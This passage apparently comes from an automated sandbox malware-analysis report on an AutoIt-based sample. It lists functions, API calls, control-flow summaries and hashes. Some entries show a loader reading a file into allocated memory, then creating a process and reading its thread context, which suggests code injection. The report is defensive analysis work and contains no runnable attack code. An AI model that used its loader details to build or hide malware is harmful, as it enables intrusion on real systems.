                                                                                    • Part of subcall function 004F3F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 004F4013
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                  • String ID: #$0$AutoIt v3
                                                                                  • API String ID: 423443420-4155596026
                                                                                  • Opcode ID: 346b925e4660590d2f01785f829663dfe43fd7f1fa0c87fcf302e31b9d56b98f
                                                                                  • Instruction ID: cb99b9cd55dd2cedf4e5b327540cdb12ec75c03a6e2b2654e154ff499462a835
                                                                                  • Opcode Fuzzy Hash: 346b925e4660590d2f01785f829663dfe43fd7f1fa0c87fcf302e31b9d56b98f
                                                                                  • Instruction Fuzzy Hash: FA21B7B0D00308AFCB84DFA9EC59B5ABFF5FB58310F50421AE204A32A0D3755548EF99
                                                                                  Function 015F7968 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1021 15f7968-15f7a16 call 15f5348 1024 15f7a1d-15f7a43 call 15f8878 CreateFileW 1021->1024 1027 15f7a4a-15f7a5a 1024->1027 1028 15f7a45 1024->1028 1035 15f7a5c 1027->1035 1036 15f7a61-15f7a7b VirtualAlloc 1027->1036 1029 15f7b95-15f7b99 1028->1029 1031 15f7bdb-15f7bde 1029->1031 1032 15f7b9b-15f7b9f 1029->1032 1037 15f7be1-15f7be8 1031->1037 1033 15f7bab-15f7baf 1032->1033 1034 15f7ba1-15f7ba4 1032->1034 1038 15f7bbf-15f7bc3 1033->1038 1039 15f7bb1-15f7bbb 1033->1039 1034->1033 1035->1029 1040 15f7a7d 1036->1040 1041 15f7a82-15f7a99 ReadFile 1036->1041 1042 15f7c3d-15f7c52 1037->1042 1043 15f7bea-15f7bf5 1037->1043 1046 15f7bc5-15f7bcf 1038->1046 1047 15f7bd3 1038->1047 1039->1038 1040->1029 1048 15f7a9b 1041->1048 1049 15f7aa0-15f7ae0 VirtualAlloc 1041->1049 1044 15f7c54-15f7c5f VirtualFree 1042->1044 1045 15f7c62-15f7c6a 1042->1045 1050 15f7bf9-15f7c05 1043->1050 1051 15f7bf7 1043->1051 1044->1045 1046->1047 1047->1031 1048->1029 1052 15f7ae7-15f7b02 call 15f8ac8 1049->1052 1053 15f7ae2 1049->1053 1054 15f7c19-15f7c25 1050->1054 1055 15f7c07-15f7c17 1050->1055 1051->1042 1061 15f7b0d-15f7b17 1052->1061 1053->1029 1057 15f7c27-15f7c30 1054->1057 1058 15f7c32-15f7c38 1054->1058 1056 15f7c3b 1055->1056 1056->1037 1057->1056 1058->1056 1062 15f7b4a-15f7b5e call 15f88d8 1061->1062 1063 15f7b19-15f7b48 call 15f8ac8 1061->1063 1069 15f7b62-15f7b66 1062->1069 1070 15f7b60 1062->1070 1063->1061 1071 15f7b68-15f7b6c CloseHandle 1069->1071 1072 15f7b72-15f7b76 1069->1072 1070->1029 1071->1072 1073 15f7b78-15f7b83 VirtualFree 1072->1073 1074 15f7b86-15f7b8f 1072->1074 1073->1074 1074->1024 1074->1029
                                                                                  APIs
                                                                                  • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 015F7A39
                                                                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 015F7C5F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1318668522.00000000015F5000.00000040.00000020.00020000.00000000.sdmp, Offset: 015F5000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_15f5000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFileFreeVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 204039940-0
                                                                                  • Opcode ID: c69e8af538ca099f1199ea1a41374fe769c00d7324591793f5319154b009097c
                                                                                  • Instruction ID: e123bd578ff54d9bc9e93826b79cebde48765674124aa9fe5544c7dcd45cbf58
                                                                                  • Opcode Fuzzy Hash: c69e8af538ca099f1199ea1a41374fe769c00d7324591793f5319154b009097c
                                                                                  • Instruction Fuzzy Hash: D4A1E674E00209EBEB14CFA4C894BEEBBB5FF48304F20859DE615BB281D7759A45CB54
                                                                                  Function 004F49FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73registryCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1130 4f49fb-4f4a25 call 4fbcce RegOpenKeyExW 1133 4f4a2b-4f4a2f 1130->1133 1134 5641cc-5641e3 RegQueryValueExW 1130->1134 1135 564246-56424f RegCloseKey 1134->1135 1136 5641e5-564222 call 50f4ea call 4f47b7 RegQueryValueExW 1134->1136 1141 564224-56423b call 4f6a63 1136->1141 1142 56423d-564245 call 4f47e2 1136->1142 1141->1142 1142->1135
                                                                                  APIs
                                                                                  • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 004F4A1D
                                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 005641DB
                                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0056421A
                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00564249
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: QueryValue$CloseOpen
                                                                                  • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                  • API String ID: 1586453840-614718249
                                                                                  • Opcode ID: 5a7353f9bd6782f32f6c6b77acf04692ae2a730c49cd3bf1cb02340b9018ff8d
                                                                                  • Instruction ID: b622d9f64d3ed5997e4f731903d1ed1a33da5420c348b9ba89430e19ab988320
                                                                                  • Opcode Fuzzy Hash: 5a7353f9bd6782f32f6c6b77acf04692ae2a730c49cd3bf1cb02340b9018ff8d
                                                                                  • Instruction Fuzzy Hash: F7116D71A00108BEEB00ABA4DD8ADBF7BBCEF15344F101059B506E3191EA75AE45EB60
                                                                                  Function 004F36B8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1157 4f36b8-4f3728 CreateWindowExW * 2 ShowWindow * 2
                                                                                  APIs
                                                                                  • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 004F36E6
                                                                                  • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 004F3707
                                                                                  • ShowWindow.USER32(00000000,?,?,?,?,004F3AA3,?), ref: 004F371B
                                                                                  • ShowWindow.USER32(00000000,?,?,?,?,004F3AA3,?), ref: 004F3724
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$CreateShow
                                                                                  • String ID: AutoIt v3$edit
                                                                                  • API String ID: 1584632944-3779509399
                                                                                  • Opcode ID: c29352f760371c535bb96a0c86ebdacaffe599d7e97c27e9559ed178a6f6b64e
                                                                                  • Instruction ID: ab25cd76803afae2d960ee0b632e9adb0e4584107e0138bb96bafa218ab16b46
                                                                                  • Opcode Fuzzy Hash: c29352f760371c535bb96a0c86ebdacaffe599d7e97c27e9559ed178a6f6b64e
                                                                                  • Instruction Fuzzy Hash: C9F030719442D87BE7B067576C1CE672E7DD7D6F20B50011ABA08A21A0C1611889EA78
                                                                                  Function 015F76F8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 160fileCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1262 15f76f8-15f786b call 15f5348 call 15f75e8 CreateFileW 1269 15f786d 1262->1269 1270 15f7872-15f7882 1262->1270 1271 15f7922-15f7927 1269->1271 1273 15f7889-15f78a3 VirtualAlloc 1270->1273 1274 15f7884 1270->1274 1275 15f78a7-15f78be ReadFile 1273->1275 1276 15f78a5 1273->1276 1274->1271 1277 15f78c2-15f78fc call 15f7628 call 15f65e8 1275->1277 1278 15f78c0 1275->1278 1276->1271 1283 15f78fe-15f7913 call 15f7678 1277->1283 1284 15f7918-15f7920 ExitProcess 1277->1284 1278->1271 1283->1284 1284->1271
                                                                                  APIs
                                                                                    • Part of subcall function 015F75E8: Sleep.KERNELBASE(000001F4), ref: 015F75F9
                                                                                  • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 015F7861
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1318668522.00000000015F5000.00000040.00000020.00020000.00000000.sdmp, Offset: 015F5000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_15f5000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFileSleep
                                                                                  • String ID: WCPX2RVAV2TN4C74
                                                                                  • API String ID: 2694422964-3010691817
                                                                                  • Opcode ID: ff88832d3ef15c3e93c81d149843f307b2a604ebe69fa25a3c737e3680d92194
                                                                                  • Instruction ID: cfd83a0efdc95dd5109a89b89b021d85db5d4d21df5e934e03272769082c0ba7
                                                                                  • Opcode Fuzzy Hash: ff88832d3ef15c3e93c81d149843f307b2a604ebe69fa25a3c737e3680d92194
                                                                                  • Instruction Fuzzy Hash: 5C618E30E14249EBEF11DBA4D854BEEBB79EF58300F004599E248BB2C0D7BA5A45CB65
                                                                                  Function 004F4A30 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 138COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                    • Part of subcall function 004F5374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,005B1148,?,004F61FF,?,00000000,00000001,00000000), ref: 004F5392
                                                                                    • Part of subcall function 004F49FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 004F4A1D
                                                                                  • _wcscat.LIBCMT ref: 00562D80
                                                                                  • _wcscat.LIBCMT ref: 00562DB5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcscat$FileModuleNameOpen
                                                                                  • String ID: 8![$\$\Include\
                                                                                  • API String ID: 3592542968-2265414088
                                                                                  • Opcode ID: 263dd7d2be540a1725d4fb5f13283f92ca79810f7440cb400a0b5806d7ddc338
                                                                                  • Instruction ID: 1aa3dbd7bda33aa3936d1e5b9191832a46341600002a419272a28756c86a747d
                                                                                  • Opcode Fuzzy Hash: 263dd7d2be540a1725d4fb5f13283f92ca79810f7440cb400a0b5806d7ddc338
                                                                                  • Instruction Fuzzy Hash: 6D5183754043449BC344EF5AE9818ABB7F8FFA9304F404A2EF644932A1DB74A948DB66
                                                                                  Function 004F51AF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 004F522F
                                                                                  • _wcscpy.LIBCMT ref: 004F5283
                                                                                  • Shell_NotifyIconW.SHELL32(00000001,?), ref: 004F5293
                                                                                  • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00563CB0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: IconLoadNotifyShell_String_memset_wcscpy
                                                                                  • String ID: Line:
                                                                                  • API String ID: 1053898822-1585850449
                                                                                  • Opcode ID: 1b2fe7c43b656beb86b1e7a3563b30c4a13db778ef4757353f8ea3fe58640207
                                                                                  • Instruction ID: 1455b99fc5d4f8a576757ee798697a683580eba319dc534e1c4bb419aa3cbcf1
                                                                                  • Opcode Fuzzy Hash: 1b2fe7c43b656beb86b1e7a3563b30c4a13db778ef4757353f8ea3fe58640207
                                                                                  • Instruction Fuzzy Hash: 0B31A1714087486BD360EB50EC46BEB7BE8AF54304F00461FF78592191DB78B648CB9A
                                                                                  Function 004F4139 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 258COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 004F41A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,004F39FE,?,00000001), ref: 004F41DB
                                                                                  • _free.LIBCMT ref: 005636B7
                                                                                  • _free.LIBCMT ref: 005636FE
                                                                                    • Part of subcall function 004FC833: __wsplitpath.LIBCMT ref: 004FC93E
                                                                                    • Part of subcall function 004FC833: _wcscpy.LIBCMT ref: 004FC953
                                                                                    • Part of subcall function 004FC833: _wcscat.LIBCMT ref: 004FC968
                                                                                    • Part of subcall function 004FC833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 004FC978
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                                                                                  • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                  • API String ID: 805182592-1757145024
                                                                                  • Opcode ID: dade6d29f97988e8f64ebfcbbb5220522651b6a0f7a97394d695ae5bfdf2e480
                                                                                  • Instruction ID: e9d5cb6997158ced4e1a5ed8dbd2da6fe5e7dc2f9c8a2161509034b482715355
                                                                                  • Opcode Fuzzy Hash: dade6d29f97988e8f64ebfcbbb5220522651b6a0f7a97394d695ae5bfdf2e480
                                                                                  • Instruction Fuzzy Hash: 9A918F7191021DAFCF04EFA5CC959FEBBB4BF59314F10442AF916AB291DB34AA04CB94
                                                                                  Function 004F40E5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 00563725
                                                                                  • GetOpenFileNameW.COMDLG32 ref: 0056376F
                                                                                    • Part of subcall function 004F660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004F53B1,?,?,004F61FF,?,00000000,00000001,00000000), ref: 004F662F
                                                                                    • Part of subcall function 004F40A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 004F40C6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Name$Path$FileFullLongOpen_memset
                                                                                  • String ID: X$t3Z
                                                                                  • API String ID: 3777226403-3443283496
                                                                                  • Opcode ID: 3ad99be990a01f421e40360452305f88c440f7a6572f83ca3fe5dd88cd4b3f71
                                                                                  • Instruction ID: b8761d8d7e74f3f2c41cdbfb919bc5c892dde5c190ccc01e191015d252e86663
                                                                                  • Opcode Fuzzy Hash: 3ad99be990a01f421e40360452305f88c440f7a6572f83ca3fe5dd88cd4b3f71
                                                                                  • Instruction Fuzzy Hash: 7821A871A1015CAFDF41DFD8D8497EEBBF8AF89304F00405AE505A7241DFB85A898F65
                                                                                  Function 005134AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __getstream.LIBCMT ref: 005134FE
                                                                                    • Part of subcall function 00517C0E: __getptd_noexit.LIBCMT ref: 00517C0E
                                                                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 00513539
                                                                                  • __wopenfile.LIBCMT ref: 00513549
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                                                  • String ID: <G
                                                                                  • API String ID: 1820251861-2138716496
                                                                                  • Opcode ID: 259371f8ff97bd6707890b35579d8ef465040f316044c701ad92f020051698b9
                                                                                  • Instruction ID: 242b7215277eec703dcf4042425023d5e94838f1361e46cc82a5b8f0c27ae264
                                                                                  • Opcode Fuzzy Hash: 259371f8ff97bd6707890b35579d8ef465040f316044c701ad92f020051698b9
                                                                                  • Instruction Fuzzy Hash: 27112770A003079AFB11BF748C466EE3FB5BF89750B158925E814DB181EB70CEC19BA1
                                                                                  Function 0050D298 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0050D28B,SwapMouseButtons,00000004,?), ref: 0050D2BC
                                                                                  • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,0050D28B,SwapMouseButtons,00000004,?,?,?,?,0050C865), ref: 0050D2DD
                                                                                  • RegCloseKey.KERNELBASE(00000000,?,?,0050D28B,SwapMouseButtons,00000004,?,?,?,?,0050C865), ref: 0050D2FF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseOpenQueryValue
                                                                                  • String ID: Control Panel\Mouse
                                                                                  • API String ID: 3677997916-824357125
                                                                                  • Opcode ID: 4824be3ec107de662e4386496b4ce9d47c874f1bcb27ced36a831e67d065e4b0
                                                                                  • Instruction ID: 5bc23f9b099dee33d7577a8ed752d5d5a18ea0079ed6e24c74238e081689ed67
                                                                                  • Opcode Fuzzy Hash: 4824be3ec107de662e4386496b4ce9d47c874f1bcb27ced36a831e67d065e4b0
                                                                                  • Instruction Fuzzy Hash: F9113979611209BFDB208FA4DC85EEF7BB8FF54744F104869E805D7150E631AE45AB70
                                                                                  Function 015F65E8 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateProcessW.KERNELBASE(?,00000000), ref: 015F6DA3
                                                                                  • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 015F6E39
                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 015F6E5B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1318668522.00000000015F5000.00000040.00000020.00020000.00000000.sdmp, Offset: 015F5000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_15f5000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                  • String ID:
                                                                                  • API String ID: 2438371351-0
                                                                                  • Opcode ID: d21c280c783bbae91a429f84d87e257f256d4475b71677e5b67df5fe47b3db5a
                                                                                  • Instruction ID: 6c2e67a741cc1c2cc404cd57e9891517a4a61dcb0623a27046ed412260713b64
                                                                                  • Opcode Fuzzy Hash: d21c280c783bbae91a429f84d87e257f256d4475b71677e5b67df5fe47b3db5a
                                                                                  • Instruction Fuzzy Hash: B062F830A14618DBEB24CFA4C840BDEB776FF58300F1095A9D20DEB294E7769E85CB59
                                                                                  Function 0053C396 Relevance: 6.2, APIs: 4, Instructions: 154COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 004F4517: _fseek.LIBCMT ref: 004F452F
                                                                                    • Part of subcall function 0053C56D: _wcscmp.LIBCMT ref: 0053C65D
                                                                                    • Part of subcall function 0053C56D: _wcscmp.LIBCMT ref: 0053C670
                                                                                  • _free.LIBCMT ref: 0053C4DD
                                                                                  • _free.LIBCMT ref: 0053C4E4
                                                                                  • _free.LIBCMT ref: 0053C54F
                                                                                    • Part of subcall function 00511C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00517A85), ref: 00511CB1
                                                                                    • Part of subcall function 00511C9D: GetLastError.KERNEL32(00000000,?,00517A85), ref: 00511CC3
                                                                                  • _free.LIBCMT ref: 0053C557
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                  • String ID:
                                                                                  • API String ID: 1552873950-0
                                                                                  • Opcode ID: 0c4af10440446b1fe8382cae8d32a76f34f7d3e1743b3aef6b58de3d60be7303
                                                                                  • Instruction ID: 02c3d7b09f09943845715867045da5477f79c909ff353281c3d8f2ae12427902
                                                                                  • Opcode Fuzzy Hash: 0c4af10440446b1fe8382cae8d32a76f34f7d3e1743b3aef6b58de3d60be7303
                                                                                  • Instruction Fuzzy Hash: 5E514BB1904219AFDF149F64DC85BAEBBB9FF88304F1004AEB219B3241DB715A808F58
                                                                                  Function 0050EB83 Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 0050EBB2
                                                                                    • Part of subcall function 004F51AF: _memset.LIBCMT ref: 004F522F
                                                                                    • Part of subcall function 004F51AF: _wcscpy.LIBCMT ref: 004F5283
                                                                                    • Part of subcall function 004F51AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 004F5293
                                                                                  • KillTimer.USER32(?,00000001,?,?), ref: 0050EC07
                                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0050EC16
                                                                                  • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00563C88
                                                                                  Memory Dump Source
